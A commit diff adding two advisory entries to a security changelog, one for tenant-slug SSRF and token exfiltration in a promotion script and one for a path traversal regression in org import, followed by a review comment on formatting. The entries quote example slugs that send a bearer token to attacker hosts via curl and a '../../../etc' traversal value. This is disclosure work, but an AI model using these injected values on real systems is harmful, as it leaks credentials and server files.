docs(security): add OFFSEC-006 + CWE-22 regression to Security Changelog

- OFFSEC-006 (2026-05-14): tenant slug SSRF + token exfiltration in
  promote-tenant-image.sh — RFC-1123 validation + set -f glob disable
- CWE-22 regression (2026-05-13): org_import.go path traversal —
  loadWorkspaceEnv replaces parseEnvFile

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
2026-05-14 04:19:32 +00:00
parent 5830875200
commit 3992150a47
@@ -9,6 +9,53 @@ This page documents security fixes shipped in the Molecule AI platform. Each ent
---
## 2026-05-14 — OFFSEC-006: Tenant Slug SSRF + Token Exfiltration in `promote-tenant-image.sh`
**Severity:** High (CWE-918 SSRF + CWE-20 Input Validation)
**PR:** [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pull/933)
**Affected:** `scripts/promote-tenant-image.sh` — tenant slug interpolation into URLs and ECR identifiers
### Vulnerability
Tenant slugs were interpolated directly into URL paths (`cp_redeploy_tenant`, `tenant_buildinfo`, `tenant_health`, `resolve_tenant_instance_id`) and ECR repository identifiers without validation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could be passed to `promote-tenant-image.sh`, causing:
1. **SSRF** — the slug injected as a URL authority or path segment, redirecting the platform's HTTP call to an attacker-controlled host.
2. **Token exfiltration**`curl ?url=https://evil.com&token=$CP_TOKEN` causes the platform's bearer token to appear in the attacker-controlled server's access logs.
Additionally, bash glob metacharacters (`*`, `?`, `[`) in slug values were subject to pathname expansion, allowing a slug like `evil?url=https://attacker.com` to expand to a list of filenames before being passed to curl.
### Fix
Two-layer defence:
1. **`set -f`** (line 57): disables glob expansion before any slug is used, so `*`, `?`, and `[` are treated as literal characters.
2. **`validate_slug()`** (new function): RFC-1123 regex validation (`^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$`) rejects any slug that does not match the tenant naming standard before any network call is issued. Invalid slugs exit with code 64.
### User-facing summary
Tenant promotion scripts now validate all tenant slug values against RFC-1123 before making any HTTP call or referencing the slug in an ECR identifier. Malformed slugs are rejected immediately with a descriptive error.
---
## 2026-05-13 — CWE-22: Path Traversal Regression in `org_import.go`
**Severity:** High (CWE-22)
**PR:** [#810](https://git.moleculesai.app/molecule-ai/molecule-core/pull/810)
**Affected:** `org_import.go``createWorkspaceTree`
### Vulnerability
A regression removed the `resolveInsideRoot` path-traversal guard from `createWorkspaceTree`. A malicious org YAML with `filesDir: "../../../etc"` could read arbitrary server files through the org template import path.
### Fix
Replaced unprotected `parseEnvFile` calls with `loadWorkspaceEnv` which applies `resolveInsideRoot` validation before accessing any path.
### User-facing summary
Org template imports now correctly validate all file paths before accessing them. Attempts to traverse outside the workspace root are rejected.
---
## 2026-04-20 — CWE-22: Path Traversal in `copyFilesToContainer`
**Severity:** High (CWE-22)
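Review bot: two list items in this hunk are missing the separator the rest of the page uses, which renders as run-together text. In the OFFSEC-006 entry, `2. **Token exfiltration**` runs straight into the `curl ?url=...` code span; item 1 on the line above uses ` — ` after the bold label, so this should read `2. **Token exfiltration** — ` followed by the command. In the CWE-22 entry, `**Affected:** `org_import.go``createWorkspaceTree`` has two adjacent code spans with no separator; the matching field in the entry above uses ` — `, so this should read `**Affected:** `org_import.go` — `createWorkspaceTree``. Two smaller points: the Fix section pins `set -f` to "line 57" of `promote-tenant-image.sh`, and a changelog line reference will silently go stale on the next edit to that script, so consider citing the function or the commit instead. And the dated ordering versus PR numbering looks inverted (2026-05-13 cites #810, 2026-05-14 cites #933); worth a quick confirmation that #810 is the PR that fixed the regression rather than the one that introduced the original `resolveInsideRoot` guard.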